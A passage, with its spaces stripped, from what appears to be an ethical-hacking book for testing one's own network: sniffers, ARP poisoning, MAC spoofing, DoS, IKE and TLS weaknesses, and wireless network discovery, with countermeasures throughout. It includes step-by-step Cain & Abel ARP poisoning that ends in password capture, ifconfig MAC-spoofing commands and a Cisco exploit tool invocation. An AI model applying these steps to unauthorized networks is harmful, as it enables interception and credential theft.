TamoSoft—themakerofCommView—hasanotherproductcalledNetResident(www.tamos.com/products/netresident)thatcantracktheusageofwell-knownprotocols,suchasHTTP,e-mail,FTP,andVoIP.AsshowninFigure9-11,youcanuseNetResidenttomonitorwebsessionsandplaythemback.
Figure9-11:NetResidentcantrackInternetusageandensuresecuritypoliciesareenforced.
NetResidentalsohasthecapabilitytoperformARPpoisoningviaitsPromiSwitchtoolavailableundertheToolsmenu,whichallowsNetResidenttoseeeverythingonthelocalnetworksegment.IcoverARPpoisoninginthesection“TheMAC-daddyattack,”laterinthischapter.
CountermeasuresagainstnetworkprotocolvulnerabilitiesAnetworkanalyzercanbeusedforgoodorevil.Thegoodistohelpensureyoursecuritypoliciesarebeingfollowed.Theeviliswhensomeoneusesanetworkanalyzeragainstyou.Afewcountermeasurescanhelppreventsomeonefromusinganunauthorizednetworkanalyzer,althoughthere’snowaytopreventitcompletely.
Ifanexternalattackerormalicioususercanconnecttoyournetwork(physicallyorwirelessly),hecancapturepacketsonthenetwork,evenifyou’reusinganEthernetswitch.
Physicalsecurity
Ensurethatadequatephysicalsecurityisinplacetopreventsomeonefrompluggingintoyournetwork:
Keepthebadguysoutofyourserverroomandwiringcloset.
Ensurethattheweb,telnet,andSSHmanagementinterfacesonyourEthernetswitchesareespeciallysecuretokeepsomeonefromchangingtheswitchportconfigurationandseeingeverythinggoingacrossthewire.
Makesurethatunsupervisedareas,suchasanunoccupiedlobbyortrainingroom,don’thavelivenetworkconnections.
Fordetailsaboutphysicalsecurity,seeChapter7.
Networkanalyzerdetection
Youcanuseanetwork-orhost-basedutilitytodeterminewhethersomeoneisrunninganunauthorizednetworkanalyzeronyournetwork:
Sniffdet(http://sniffdet.sourceforge.net)forUNIX-basedsystemsPromiscDetect(http://ntsecurity.nu/toolbox/promiscdetect)forWindows
CertainIPSscanalsodetectwhetheranetworkanalyzerisrunningonyournetwork.ThesetoolsenableyoutomonitorthenetworkforEthernetcardsthatarerunninginpromiscuousmode.Yousimplyloadtheprogramsonyourcomputer,andtheprogramsalertyouiftheyseepromiscuousbehaviorsonthenetwork(Sniffdet)orlocalsystem(PromiscDetect).
TheMAC-daddyattackAttackerscanuseARP(AddressResolutionProtocol)runningonyournetworktomaketheirsystemsappearasyoursystemoranotherauthorizedhostonyournetwork.
ARPspoofingAnexcessivenumberofARPrequestscanbeasignofanARPspoofingattack(alsocalledARPpoisoning)onyournetwork.
Aclientrunningaprogram,suchasdsniff(www.monkey.org/~dugsong/dsniff)orCain&Abel(www.oxid.it/cain.html),canchangetheARPtables—thetablesthatstoreIPaddressestomediaaccesscontrol(MAC)addressmappings—onnetworkhosts.Thiscausesthevictimcomputerstothinktheyneedtosendtraffictotheattacker’scomputerratherthantothetruedestinationcomputerwhencommunicatingonthenetwork.ARPspoofingisusedduringman-in-the-middle(MITM)attacks.
SpoofedARPrepliescanbesenttoaswitch,whichrevertstheswitchtobroadcastmodeandessentiallyturnsitintoahub.Whenthisoccurs,anattackercansniffeverypacketgoingthroughtheswitchandcaptureanythingandeverythingfromthenetwork.
ThissecurityvulnerabilityisinherentinhowTCP/IPcommunicationsarehandled.
Here’satypicalARPspoofingattackwithahacker’scomputer(Hacky)andtwolegitimatenetworkusers’computers(JoeandBob):
1. HackypoisonstheARPcachesofvictimsJoeandBobbyusingdsniff,ettercap,orautilityhewrote.
2. JoeassociatesHacky’sMACaddresswithBob’sIPaddress.3. BobassociatesHacky’sMACaddresswithJoe’sIPaddress.4. Joe’strafficandBob’strafficaresenttoHacky’sIPaddressfirst.
5. Hacky’snetworkanalyzercapturesJoe’sandBob’straffic.
IfHackyisconfiguredtoactlikearouterandforwardpackets,itforwardsthetraffictoitsoriginaldestination.Theoriginalsenderandreceiverneverknowthedifference!
UsingCain&AbelforARPpoisoningYoucanperformARPpoisoningonyourswitchedEthernetnetworktotestyourIPSortoseehoweasyitistoturnaswitchintoahubandcaptureanythingandeverythingwithanetworkanalyzer.
ARPpoisoningcanbehazardoustoyournetwork’shardwareandhealth,causingdowntimeandmore.Sobecareful!
PerformthefollowingstepstouseCain&AbelforARPpoisoning:
1. LoadCain&AbelandthenclicktheSniffertabtoenterthenetworkanalyzermode.
TheHostspageopensbydefault.
2. ClicktheStart/StopAPRicon(theyellowandblackcircle).
TheARPpoisonrouting(howCain&AbelreferstoARPpoisoning)processstartsandenablesthebuilt-insniffer.
3. Ifprompted,selectthenetworkadapterinthewindowthatappearsandthenclickOK.
4. Clicktheblue+icontoaddhoststoperformARPpoisoningon.5. IntheMACAddressScannerwindowthatappears,ensuretheAllHostsin
MySubnetoptionisselectedandthenclickOK.6. ClicktheAPRtab(theonewiththeyellow-and-blackcircleicon)toloadthe
APRpage.
7. ClickthewhitespaceundertheuppermostStatuscolumnheading(justundertheSniffertab).
Thisre-enablestheblue+icon.
8. Clicktheblue+iconandtheNewARPPoisonRoutingwindowshowsthehostsdiscoveredinStep3.
9. Selectyourdefaultroute(inmycase,10.11.12.1).
Theright-handcolumnfillswithalltheremaininghosts,asshowninFigure9-12.
10. Ctrl+clickallthehostsintherightcolumnthatyouwanttopoison.
11. ClickOKandtheARPpoisoningprocessstarts.
Thisprocesscantakeanywherefromafewsecondstoafewminutesdependingonyournetworkhardwareandeachhosts’localTCP/IPstack.TheresultsofARPpoisoningonmytestnetworkareshowninFigure9-13.
12. YoucanuseCain&Abel’sbuilt-inpasswordsfeaturetocapturepasswordstraversingthenetworktoandfromvarioushostssimplybyclickingthePasswordstab.
Figure9-12:SelectingyourvictimhostsforARPpoisoninginCain&Abel.
Figure9-13:ARPpoisoningresultsinCain&Abel.
TheprecedingstepsshowhoweasyitistoexploitavulnerabilityandprovethatEthernetswitchesaren’tallthey’recrackeduptobefromasecurityperspective.
MACaddressspoofingMACaddressspoofingtrickstheswitchintothinkingyourcomputerissomethingelse.Yousimplychangeyourcomputer’sMACaddressandmasqueradeasanotheruser.
Youcanusethistricktotestaccesscontrolsystems,suchasyourIPS/firewall,andevenyouroperatingsystemlogincontrolsthatcheckforspecificMACaddresses.
UNIX-basedsystems
InUNIXandLinux,youcanspoofMACaddresseswiththeifconfigutility.Followthesesteps:
1. Whileloggedinasroot,useifconfigtoenteracommandthatdisablesthenetworkinterface.
Insertthenetworkinterfacenumberthatyouwanttodisable(usually,eth0)intothecommand,likethis:
[root@localhostroot]#ifconfigeth0down
2. EnteracommandfortheMACaddressyouwanttouse.
InsertthefakeMACaddressandthenetworkinterfacenumber(eth0)intothecommandagain,likethis:
[root@localhostroot]#ifconfigeth0hwether
new_mac_address
Youcanuseamorefeature-richutilitycalledGNUMACChanger(https://github.com/alobbs/macchanger)forLinuxsystems.
Windows
YoucanuseregedittoedittheWindowsRegistry,butIlikeusinganeatWindowsutilitycalledSMAC(www.klcconsulting.net/smac),whichmakesMACspoofingasimpleprocess.FollowthesestepstouseSMAC:
1. Loadtheprogram.2. SelecttheadapterforwhichyouwanttochangetheMACaddress.3. EnterthenewMACaddressintheNewSpoofedMACAddressfieldsand
clicktheUpdateMACbutton.4. Stopandrestartthenetworkcardwiththesesteps:
a. Right-clickthenetworkcardinNetworkandDialupConnectionsandthenchooseDisable.
b. Right-clickagainandthenchooseEnableforthechangetotakeeffect.
Youmighthavetorebootforthistoworkproperly.
5. ClicktheRefreshbuttonintheSMACinterface.
ToreverseRegistrychangeswithSMAC,followthesesteps:
1. SelecttheadapterforwhichyouwanttochangetheMACaddress.2. ClicktheRemoveMACbutton.3. Stopandrestartthenetworkcardwiththesesteps:
a. Right-clickthenetworkcardinNetworkandDialupConnectionsandthenchooseDisable.
b. Right-clickagainandthenchooseEnableforthechangetotakeeffect.
Youmighthavetorebootforthistoworkproperly.
4. ClicktheRefreshbuttonintheSMACinterface.
YoushouldseeyouroriginalMACaddressagain.
CountermeasuresagainstARPpoisoningandMACaddressspoofingattacksAfewcountermeasuresonyournetworkcanminimizetheeffectsofanattackagainstARPandMACaddresses:
Prevention:YoucanpreventMACaddressspoofingifyourswitchescanenableportsecuritytopreventautomaticchangestotheMACaddresstables.
NorealisticcountermeasuresforARPpoisoningexist.TheonlywaytopreventARPpoisoningistocreateandmaintainstaticARPentriesinyourswitchesforeveryhostonthenetwork.Thisissomethingthathardlyanynetworkadministratorhastimetodointoday’sratrace.
Detection:YoucandetectthesetwotypesofhacksthroughanIPSorastandaloneMACaddress–monitoringutility.
Arpwatch(http://linux.maruhn.com/sec/arpwatch.html)isaLinux-basedprogramthatalertsyouviae-mailwhenitdetectschangesinMACaddressesassociatedwithspecificIPaddressesonthenetwork.
WhatyouneedtoknowaboutadvancedmalwareAdvancedmalware(alsoknownasadvancedpersistentthreatorAPT)hasbeenalltheragelately.Suchtargetedattacksarehighly-sophisticatedandextremelydifficulttodetect—thatis,unlessyouhavethepropercontrolsandthenetworkand/orhostlayers.IonceworkedonaprojectwherealargeenterprisewastargetedbyaNationState(presumablybecauseofthelineofworktheenterprisewasin)andendeduphavingover10,000Windowsserversandworkstationsinfectedbymalware.Theenterprise’straditional,bigboxantivirussoftwarewasnonethewiser.Theprojectturnedouttobeanextensiveexerciseinincidentresponseandforensics.Theinfectionwastracedbacktoaphishingattackthatsubsequentlyspreadtoallthesystemswhile,atthesametime,installingpassword-crackingtoolstoattempttocrackthelocalSAMfileoneachWindowsmachine.
Thisadvancedmalwareinfectionisjustoneofcountlessexamplesofnewadvancedmalwarethatmostorganizationsarenotpreparedtoprevent.Theobvioussolutiontopreventsuchattacksistokeepusersfromclickingmaliciouslinksandpreventingmalwarefrombeing“dropped”ontothesystem.That’stough,ifnotimpossible,toprevent.Thenextbestthingistousetechnologytoyouradvantage.AdvancedmalwaremonitoringandthreatprotectiontoolssuchasDamballaFailsafe(www.damballa.com/solutions/damballa_failsafe.php),Next-GenerationFirewallssuchaswhat’sofferedbyPaloAltoNetworks(www.paloaltonetworks.com),andwhitelisting,a.k.a.“positivesecurity”technologiessuchastheBit9SecurityPlatform(www.bit9.com/solutions/security-platform)thathelpsprotectthehostareagreatwaytofightthisthreat.
Thebottomline:Don’tunderestimatetheriskandpoweroftargetedmalwareattacks.
TestingdenialofserviceattacksDenialofservice(DoS)attacksareamongthemostcommonhackerattacks.Ahackerinitiatessomanyinvalidrequeststoanetworkhostthatthehostusesallitsresourcesrespondingtotheinvalidrequestsandignoresthelegitimaterequests.
DoSattacksDoSattacksagainstyournetworkandhostscancausesystemstocrash,datatobelost,andeveryusertojumponyourcasewonderingwhenInternetaccesswillberestored.
HerearesomecommonDoSattacksthattargetanindividualcomputerornetworkdevice:
SYNfloods:TheattackerfloodsahostwithTCPSYNpackets.PingofDeath:TheattackersendsIPpacketsthatexceedthemaximumlengthof65,535bytes,whichcanultimatelycrashtheTCP/IPstackonmanyoperatingsystems.WinNuke:ThisattackcandisablenetworkingonolderWindows95andWindowsNTcomputers.
DistributedDoS(DDoS)attackshaveanexponentiallygreaterimpactontheirvictims.OneofthemostfamouswastheDDoSattackagainsteBay,Yahoo!,CNN,anddozensofotherwebsitesbyahackerknownasMafiaBoy.Whileupdatingthisbooktothethirdedition,therewasahighlypublicizedDDoSattackagainstTwitter,Facebook,andothersocialmediasites.TheattackwasapparentlyaimedatoneuserfromGeorgia(theformerSovietcountry,notthestatewhereIlive),butitaffectedeveryoneusingthesesites.Icouldn’ttweet,andmanyofmyfriendsandfamilymemberscouldn’tseewhateveryonewasblabbingaboutonFacebook(oh,thehumanity!).Therehavebeen
numerousotherhighly-publicizedDDoSattackssincethen.Thinkaboutthis:WhenhundredsofmillionsofpeoplecanbetakenofflinebyonetargetedDDoSattack,youcanseewhyunderstandingthedangersofdenialofserviceagainstyourbusiness’ssystemsandapplicationsisimportant.
TestingDenialofservicetestingisoneofthemostdifficultsecuritychecksyoucanrun.Therejustaren’tenoughofyouandyourcomputerstogoaround.Don’tfret.Youcanrunafewteststoseewhereyou’reweak.YourfirsttestshouldbeasearchforDoSvulnerabilitiesfromavulnerability-scanningperspective.Usingvulnerabilityscanners,suchasNexpose(www.rapid7.com/products/nexpose)andAppSpider(www.rapid7.com/products/appspider),youcanfindmissingpatchesandconfigurationweaknessesthatcanleadtodenialofservice.
IonceperformedasecurityassessmentwhereIusedQualystofindavulnerabilityinanolderversionofOpenSSLrunningonawebserver.AswithmostDoSfindings,Ididn’tactuallyexploitthevulnerabilitybecauseIdidn’twanttotakedowntheproductionsystem.Instead,Ilisteditasa“mediumpriority”vulnerability—anissuethathadthepotentialtobeexploited.MyclientpushedbackandsaidOpenSSLwasn’tonthesystem.Withpermission,IdownloadedtheexploitcodeavailableontheInternet,compiledit,andranitagainstmyclient’sserver.Sureenough,ittooktheserveroffline.
Atfirst,myclientthoughtitwasafluke,butaftertakingtheserverofflineagain,heboughtintothevulnerability.ItendedupthathewasusinganOpenSSLderivative,hencethevulnerability.Hadmyclientnotfixedtheproblem,therecouldhavebeenanynumberofattackersaroundtheworldtaking—andkeeping—thisproductionsystemoffline,whichcouldhavebeenbothtrickyandtimeconsumingtotroubleshoot.Notgoodforbusiness!
Don’ttestforDoSunlessyouhavetestsystemsorcanperformcontrolledtestswiththepropertools.PoorlyplannedDoStestingisajobsearchinthemaking.It’sliketryingtodeletedatafromanetworkshareandhopingthattheaccesscontrolsinplacearegoingtopreventit.
OtherDoStestingtoolsworthcheckingoutareUDPFlood(www.mcafee.com/us/downloads/free-tools/udpflood.aspx),Blast(www.mcafee.com/us/downloads/free-tools/blast.aspx),NetScanToolsPro,andCommView.
CountermeasuresagainstDoSattacksMostDoSattacksaredifficulttopredict,buttheycanbeeasytoprevent:
Testandapplysecuritypatches(includingservicepacksandfirmwareupdates)assoonaspossiblefornetworkhosts,suchasroutersandfirewalls,as
wellasforserverandworkstationoperatingsystems.
UseanIPStomonitorregularlyforDoSattacks.
Youcanrunanetworkanalyzerincontinuouscapturemodeifyoucan’tjustifythecostofanall-outIPSsolutionanduseittomonitorforDoSattacks.
Configurefirewallsandrouterstoblockmalformedtraffic.Youcandothisonlyifyoursystemssupportit,sorefertoyouradministrator’sguidefordetails.MinimizeIPspoofingbyfilteringoutexternalpacketsthatappeartocomefromaninternaladdress,thelocalhost(127.0.0.1),oranyotherprivateandnon-routableaddress,suchas10.x.x.x,172.16.x.x–172.31.x.x,or192.168.x.x.ThefollowingpaperfromCiscoSystemsprovidesmoreinformation:www.cisco.com/web/about/ac123/ac147/archived_issues/ipj_10-4/104_ip-
spoofing.html.BlockallICMPtrafficinboundtoyournetworkunlessyouspecificallyneedit.Eventhen,youshouldallowittocomeinonlytospecifichosts.DisableallunneededTCP/UDPsmallservices,suchasechoandchargen.
EstablishabaselineofyournetworkprotocolsandtrafficpatternsbeforeaDoSattackoccurs.Thatway,youknowwhattolookfor.AndperiodicallyscanforsuchpotentialDoSvulnerabilitiesasrogueDoSsoftwareinstalledonnetworkhosts.
IfyougetyourselfinarealbindandendupunderdirectDoSassault,youcanreachouttomanagedservicevendorssuchasImperva’sIncapsula(www.incapsula.com),CloudFlare(www.cloudflare.com),andDOSarrest(www.dosarrest.com)whocanhelpyouout.
Workwithaminimumnecessarymentality(nottobeconfusedwithhavingtoomanycraftbeers)whenconfiguringyournetworkdevices,suchasfirewallsandrouters:
Identifytrafficthatisnecessaryforapprovednetworkusage.Allowthetrafficthat’sneeded.Denyallothertraffic.
Ifworsecomestoworst,you’llneedtoworkwithyourISPandseewhethertheycanblockDoSattacksontheirend.
DetectingCommonRouter,Switch,andFirewallWeaknesses
InadditiontothemoretechnicalexploitsthatIcoverinthischapter,somehigh-levelsecurityvulnerabilitiescommonlyfoundonnetworkdevicescancreatemanyproblems.
FindingunsecuredinterfacesYouwanttoensurethatHTTPandtelnetinterfacestoyourrouters,switches,andfirewallaren’tconfiguredwithablank,default,orotherwiseeasy-to-guesspassword.Thisadvicesoundslikeano-brainer,butit’sbyfaroneofthemostcommonweaknesses.Whenamaliciousinsiderorotherattackergainsaccesstoyournetworkdevices,heownsthenetwork.Hecanthenlockoutadministrativeaccess,setupback-dooruseraccounts,reconfigureports,andevenbringdowntheentirenetworkwithoutyoueverknowing.
IoncefoundasimplepasswordthatasystemsintegratorhadconfiguredonaCiscoASAfirewallandwasabletologintothefirewallwithfulladministrativerights.Justimaginewhatcouldhappeninthissituationifsomeonewithmaliciousintentcameacrossthispassword.Lessonlearned:It’sthelittlethingsthatcangetyou.Knowwhatyourvendorsaredoingandkeepaneyeonthem!
AnotherweaknessisrelatedtoHTTPandtelnetbeingenabledandusedonmanynetworkdevices.Caretoguesswhythisisaproblem?Well,anyonewithsomefreetoolsandafewminutesoftimecansniffthenetworkandcapturelogincredentialsforthesesystemswhenthey’rebeingsentincleartext.Whenthathappens,anythinggoes.
ExploitingIKEweaknessesBusinessesrunningaVPNonarouterorfirewallarecommon.Ifyoufallintothiscategory,chancesaregoodthatyourVPNisrunningtheInternetKeyExchange(IKE)protocol,whichhasacoupleofwell-knownexploitableweaknesses:
It’spossibletocrackIKE“aggressivemode”pre-sharedkeysusingCain&AbelandtheIKECracktool(http://ikecrack.sourceforge.net).SomeIKEconfigurations,suchasthoseincertainCiscoPIXfirewalls,canbetakenoffline.Alltheattackerhastodoissend10packetspersecondat122byteseachandyouhaveaDoSattackonyourhands.
Youcanmanuallypokearoundtoseewhetheryourrouter,switches,andfirewallsarevulnerabletotheseissues,butthebestwaytofindthisinformationistouseawell-knownvulnerabilityscanner,suchasNexpose.Afteryoufindwhichvulnerabilities
exist,youcantakethingsastepfurtherbyusingtheCiscoGlobalExploitertool(availableviatheKaliLinuxtoolset).TorunCiscoGlobalExploiter,followthesesteps:
1. DownloadandburntheBackTrackLinuxISOimagetoDVDorboottheimagedirectlythroughVMwareorVirtualBox.
2. AfteryouentertheKaliLinuxGUI,clickApplications,VulnerabilityAnalysis,CiscoTool,andthencisco-global-exploiter.
3. Enterthecommandperlcge.plip_addressexploit_number,asshowninFigure9-14.
Figure9-14:CiscoGlobalExploitertoolforexploitingwell-knownCiscoweaknesses.
AnotherCiscorouter-relatedtooliscalledSynfulKnockScanner(http://talosintel.com/scanner)thattestssystemsforthenastySYNfulKnockmalwarethatwasdiscoveredin2015.
Goodscannersandexploitationtoolswillsaveyouatonoftimeandeffortthatyoucanspendonother,moreimportantthings,suchasFacebookandTwitter.
UncoveringissueswithSSLandTLSSSLandTransportLayerSecurity(TLS)werelongtoutedasthesolutionforsecuringnetworkcommunications.However,recently,SSLandTLShavecomeunderfirewithdemonstrableexploitssuchasHeartbleed,PaddingOracleOnDowngradedLegacyEncryption(POODLE),andFactoringAttackonRSA-EXPORTKeys(FREAK).
GeneralsecurityvulnerabilitiesrelatedtoSSLandTLSareoftenuncoveredbyvulnerabilityscannerssuchasNexposeandNetsparker.InadditiontothethreeSSL/TLSvulnerabilitiesabove,beonthelookoutforthefollowingflawsaswell:
SSLversions2or3aswellasTLSversions1.0or1.1inuse.WeakencryptioncipherssuchasRC4andSHA-1.
IfyouareunsureaboutexistingSSLandTLSvulnerabilitiesonyoursystems,youdon’thavetouseavulnerabilityscanneratall.QualyshasanicewebsitecalledSSLLabs(www.ssllabs.com)thatwillscanforthesevulnerabilitiesforyou.
Ididn’tusedtobetooconcernedwithSSLandTLS-relatedvulnerabilities,butassecurityresearchersandcriminalhackershavebeendemonstrating,thethreatisrealandneedstobeaddressed.
PuttingUpGeneralNetworkDefensesRegardlessofthespecificattacksagainstyoursystem,afewgoodpracticescanhelppreventmanynetworkproblems:
Usestatefulinspectionrulesthatmonitortrafficsessionsforfirewalls.ThiscanhelpensurethatalltraffictraversingthefirewallislegitimateandcanpreventDoSattacksandotherspoofingattacks.Implementrulestoperformpacketfilteringbasedontraffictype,TCP/UDPports,IPaddresses,andevenspecificinterfacesonyourroutersbeforethetrafficisallowedtoenteryournetwork.UseproxyfilteringandNetworkAddressTranslation(NAT)orPortAddressTranslation(PAT).Findandeliminatefragmentedpacketsenteringyournetwork(fromFraggleoranothertypeofattack)viaanIPS.Includeyournetworkdevicesinyourvulnerabilityscans.Ensureyournetworkdeviceshavethelatestvendorfirmwareandpatchesapplied.Setstrongpasswords—betteryet,passphrases—onallnetworksystems.IcoverpasswordsinmoredetailinChapter8.Don’tuseIKEaggressivemodepre-sharedkeysforyourVPN.Ifyoumust,ensurethepassphraseisstrongandchangedperiodically(suchasevery6–12months).AlwaysuseTLS(viaHTTPS,etc.)orSSHwhenconnectingtonetworkdevices.DisableSSLandweakciphersandonlyuseTLSversion1.2andstrongcipherssuchasSHA-2wherepossible.Segmentthenetworkanduseafirewallonthefollowing:
TheDMZTheinternalnetworkCriticalsubnetworksbrokendownbybusinessfunctionordepartment,suchasaccounting,finance,HR,andresearch
WirelessNetworksInThisChapter
Understandingrisksofwirelessnetworks
Selectingwirelessnetworkhackingtools
Crackingwirelessencryption
Minimizingwirelessnetworkrisks
Wirelesslocalareanetworks(orWi-Fi)—specifically,theonesbasedontheIEEE802.11standard—areincreasinglybeingdeployedintobothbusinessandhomenetworks.Wi-Fihasbeentheposterchildforweaksecurityandnetworkhackattackssincetheinceptionof802.11adecadeandahalfago.ThestigmaofunsecureWi-Fiisstartingtowane,butthisisn’tthetimetoloweryourdefenses.
Wi-Fioffersatonofbusinessvalue,fromconveniencetoreducednetworkdeploymenttime.Whetherornotyourorganizationallowswirelessnetworkaccess,youprobablyhaveit,sotestingforWi-Fisecurityvulnerabilitiesiscritical.Inthischapter,Icoversomecommonwirelessnetworksecurityvulnerabilitiesthatyoushouldtestfor,andIdiscusssomecheapandeasycountermeasuresthatyoucanimplementtohelpensurethatWi-Fiisn’tmoreofarisktoyourorganizationthanit’sworth.
UnderstandingtheImplicationsofWirelessNetworkVulnerabilities
Wi-Fiisverysusceptibletoattack—evenmoresothanwirednetworks(discussedinChapter9)ifit’snotconfiguredordeployedproperly.Wirelessnetworkshavelong-standingvulnerabilitiesthatcanenableanattackertobringyournetworktoitskneesorallowyoursensitiveinformationtobeextractedrightoutofthinair.Ifyourwirelessnetworkiscompromised,youcanexperiencethefollowingproblems:
Lossofnetworkaccess,includinge-mail,web,andotherservicesthatcancausebusinessdowntimeLossofsensitiveinformation,includingpasswords,customerdata,intellectualproperty,andmoreRegulatoryconsequencesandlegalliabilitiesassociatedwithunauthorizedusersgainingaccesstoyourbusinesssystems
Mostofthewirelessvulnerabilitiesareintheimplementationofthe802.11standard.Wirelessaccesspoints(APs)andclientsystemshavesomevulnerabilitiesaswell.
Variousfixeshavecomealonginrecentyearstoaddressthesevulnerabilities,yetstillmanyofthesefixeshaven’tbeenproperlyappliedoraren’tenabledbydefault.Youremployeesmightalsoinstallroguewirelessequipmentonyournetworkwithoutyourknowledge.Thenthere’s“free”Wi-Fipracticallyeverywhereyourmobileworkforcegoes.Fromcoffeeshopstohotelstoconferencecenters,theseInternetconnectionsareoneofthemostseriousthreatstoyouroverallinformationsecurityandaprettydifficultonetofight.EvenwhenWi-Fiishardenedandallthelatestpatcheshavebeenapplied,youstillmighthavesecurityproblems,suchasdenialofservice(DoS),man-in-the-middleattacks,andencryptionkeyweaknesses(likeyouhaveonwirednetworks—seeChapter9),thatwilllikelybearoundforawhile.
ChoosingYourToolsSeveralgreatwirelesssecuritytoolsareavailableforboththeWindowsandLinuxplatforms.Earlieron,Linuxwirelesstoolswereabeartoconfigureandrunproperly,probablybecauseI’mnotthatsmart.However,thatproblemhaschangedinrecentyearswithprogramssuchasKismet(www.kismetwireless.net),Wellenreiter(http://sourceforge.net/projects/wellenreiter),andKaliLinux(www.kali.org).
IfyouwantthepowerofthesecuritytoolsthatrunonLinux,butyou’renotinterestedininstallingandlearningmuchaboutLinuxordon’thavethetimetodownloadandsetupmanyofitspopularsecuritytools,IhighlyrecommendyoucheckoutKaliLinux.ThebootableDebian-basedsecuritytestingsuitecomeswithaslewoftoolsthatarerelativelyeasytouse.Alternativebootable(orlive)testingsuitesincludetheFedoraLinux-basedNetworkSecurityToolkit(www.networksecuritytoolkit.org).AcompletelistingoflivebootableLinuxtoolkitsisavailableatwww.livecdlist.com.
MostofthetestsIoutlineinthischapterrequireonlyWindows-basedutilitiesbutusetheplatformyou’remostfamiliarwith.You’llgetbetterresultsthatway.MyfavoritetoolsforassessingwirelessnetworksinWindowsareasfollows:
Aircrack-ng(http://aircrack-ng.org)CommViewforWiFi(www.tamos.com/products/commwifi)ElcomSoftWirelessSecurityAuditor(www.elcomsoft.com/ewsa.html)OmniPeek(www.savvius.com)
Youcanalsouseahandheldwirelesssecuritytestingdevice,suchasthehandyDigitalHotspotterbyCanaryWireless(www.canarywireless.com)andevenyourAndroid-basedphoneortabletwithappssuchasWiEyeorWifiAnalyzeroriOSdevicewithappssuchasNetworkAnalyzerandNetworkMultimeter.Anexternalantennaisalsosomethingtoconsideraspartofyourarsenal.Ihavehadgoodluckrunningtestswithoutanantenna,butyourmileagemayvary.Ifyou’reperformingawalkthroughofyourfacilitiestotestforwirelesssignals,forexample,usinganadditionalantennaincreasesyouroddsoffindingbothlegitimateand(moreimportant)unauthorizedwirelesssystems.Youcanchooseamongthreetypesofwirelessantennas:
Omnidirectional:Transmitsandreceiveswirelesssignalsin360degreesovershorterdistances,suchasinboardroomsorreceptionareas.Theseantennas,alsoknownasdipoles,typicallycomeinstalledonAPsfromthefactory.
Semidirectional:Transmitsandreceivesdirectionallyfocusedwirelesssignalsovermediumdistances,suchasdowncorridorsandacrossonesideofanofficeorbuilding.Directional:Transmitsandreceiveshighlyfocusedwirelesssignalsoverlongdistances,suchasbetweenbuildings.Thisantenna,alsoknownasahigh-gainantenna,istheantennaofchoiceforwirelesshackersdrivingaroundcitieslookingforvulnerableAPs—anactknownaswardriving.
Asanalternativetotheantennasdescribedintheprecedinglist,youcanuseaniftycandesign—calledacantenna—madefromaPringles,coffee,orpork-and-beanscan.Ifyou’reinterestedintryingthis,checkoutthearticleatwww.turnpoint.net/wireless/has.htmlfordetails.AsimpleInternetsearchturnsupalotofinformationonthissubject,ifyou’reinterested.Onesiteinparticular(www.cantenna.com)sellstheSuperCantennakit,whichhasworkedwellforme.
DiscoveringWirelessNetworksAfteryouhaveawirelesscardandwirelesstestingsoftware,you’rereadytoroll.Thefirsttestsyoushouldperformgatherinformationaboutyourwirelessnetwork,asdescribedinthefollowingsections.
CheckingforworldwiderecognitionThefirsttestrequiresonlytheMACaddressofyourAPandaccesstotheInternet.(YoucanfindoutmoreaboutMACaddresseslaterinthischapter,inthe“Macspoofing”section.)You’retestingtoseewhethersomeonehasdiscoveredyourWi-Fisignalandpostedinformationaboutitfortheworldtosee.Here’showthetestworks:
1. FindyourAP’sMACaddress.
Ifyou’renotsurewhatyourAP’sMACaddressis,youshouldbeabletoviewitbyusingthearp-acommandataWindowscommandprompt.Youmighthavetopingtheaccesspoint’sIPaddressfirstsotheMACaddressisloadedintoyourARPcache.Figure10-1showswhatthiscanlooklike.
2. AfteryouhavetheAP’sMACaddress,browsetotheWiGLEdatabaseofwirelessnetworks(https://wigle.net).
3. Registerwiththesitesoyoucanperformadatabasequeries.It’sworthit.
4. SelecttheLoginlinkintheupperrightcornerofthewebsiteandthenselectViewandthenSearch
YouseeascreensimilartoFigure10-2.
5. Toseewhetheryournetworkislisted,youcanentersuchAPinformationasgeographicalcoordinatesandSSID(servicesetidentifier),butthesimplestthingtodoisenteryourMACaddressintheformatshownintheexamplefortheBSSID/MACtextbox.
IfyourAPislisted,someonehasdiscoveredit—mostlikelyviawardriving—andhaspostedtheinformationforotherstosee.Youneedtostartimplementingthesecuritycountermeasureslistedinthischapterassoonaspossibletokeepothersfromusingthisinformationagainstyou!
Figure10-1:FindingtheMACaddressofanAPbyusingarp.
Figure10-2:SearchingforyourwirelessAPsusingtheWiGLEdatabase.
ScanningyourlocalairwavesMonitortheairwavesaroundyourbuildingtoseewhatauthorizedandunauthorizedAPsyoucanfind.You’relookingfortheSSID,whichisyourwirelessnetworkname.Ifyouhavemultipleandseparatewirelessnetworks,eachonemayormaynothaveauniqueSSIDassociatedwithit.
YoucangetstartedwithatoolsuchasNetStumbler(www.netstumbler.com/downloads).NetStumblercandiscoverSSIDsandotherdetailedinformationaboutwirelessAPs,includingthefollowing:
MACaddressNameRadiochannelinuseVendornameWhetherencryptionisonoroffRFsignalstrength(signal-to-noiseratio)
NetStumblerisquiteoldandisnolongermaintainedbutitstillworksnonetheless.AnothertooloptionisinSSIDer(www.inssider.com).
Figure10-3showsanexampleofwhatyoumightseewhenrunningNetStumblerinyourenvironment.Theinformationthatyouseehereiswhatotherscanseeaslongasthey’reinrangeofyourAP’sradiosignals.NetStumblerandmostothertoolsworkby
sendingaprobe-requestsignalfromtheclient.AnyAPswithinsignalrangemustrespondtotherequestwiththeirSSIDs—thatis,ifthey’reconfiguredtobroadcasttheirSSIDsuponrequest.
Figure10-3:NetStumblerdisplaysdetaileddataonAPs.
Whenyou’reusingwirelessnetworkanalyzers,includingOmniPeekandCommViewforWiFi,youradaptermightenterpassivemonitoringmode.ThismeansyoucannolongercommunicatewithotherwirelesshostsorAPswhiletheprogramisloaded.
DiscoveringWirelessNetworkAttacksandTakingCountermeasures
Variousmalicioushacks—includingDoSattacks—canbecarriedoutagainstyourWLAN.ThisincludesforcingAPstorevealtheirSSIDsduringtheprocessofbeingdisassociatedfromthenetworkandrejoining.Inaddition,hackerscanliterallyjamtheRFsignalofanAP—especiallyin802.11band802.11gsystems—andforcethewirelessclientstore-associatetoarogueAPmasqueradingasthevictimAP.
Hackerscancreateman-in-the-middleattacksbymaliciouslyusingatoolsuchastheWiFiPineapple(www.wifipineapple.com/index.php)andcanfloodyournetworkwiththousandsofpacketspersecondbyusingtherawpacket-generationtoolsNping(https://nmap.org/nping)orNetScanToolsPro(www.netscantools.com)—enoughtobringthenetworktoitsknees.Evenmoresothanwithwirednetworks,thistypeofDoSattackisverydifficulttopreventonWi-Fi.
